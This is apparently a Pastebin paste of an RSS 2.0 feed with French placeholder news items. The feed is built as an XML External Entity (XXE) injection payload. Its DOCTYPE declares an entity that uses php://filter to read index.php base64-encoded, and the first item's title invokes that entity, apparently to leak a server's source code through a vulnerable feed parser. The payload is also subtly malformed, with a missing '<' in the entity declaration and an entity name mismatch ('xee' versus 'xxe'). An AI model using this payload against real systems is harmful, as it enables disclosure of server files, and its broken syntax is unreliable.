Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?xml version="1.0" encoding="UTF-8"?>
- <!DOCTYPE channel [!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php">
- ]>
- <rss version="2.0">
- <channel>
- <title>Mon site</title>
- <description>lol</description>
- <lastBuildDate>Sat, 07 Sep 2002 00:00:01 GMT</lastBuildDate>
- <link>http://www.example.org</link>
- <item>
- <title>actualité &xee;</title>
- <description>Ceci est ma première actualité</description>
- <pubDate>Sat, 07 Sep 2002 00:00:01 GMT</pubDate>
- <link>http://www.example.org/actu1</link>
- </item>
- <item>
- <title>Actualité N°2</title>
- <description>Ceci est ma seconde actualité</description>
- <pubDate>Sat, 07 Sep 2002 00:00:01 GMT</pubDate>
- <link>http://www.example.org/actu2</link>
- </item>
- </channel>
- </rss>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement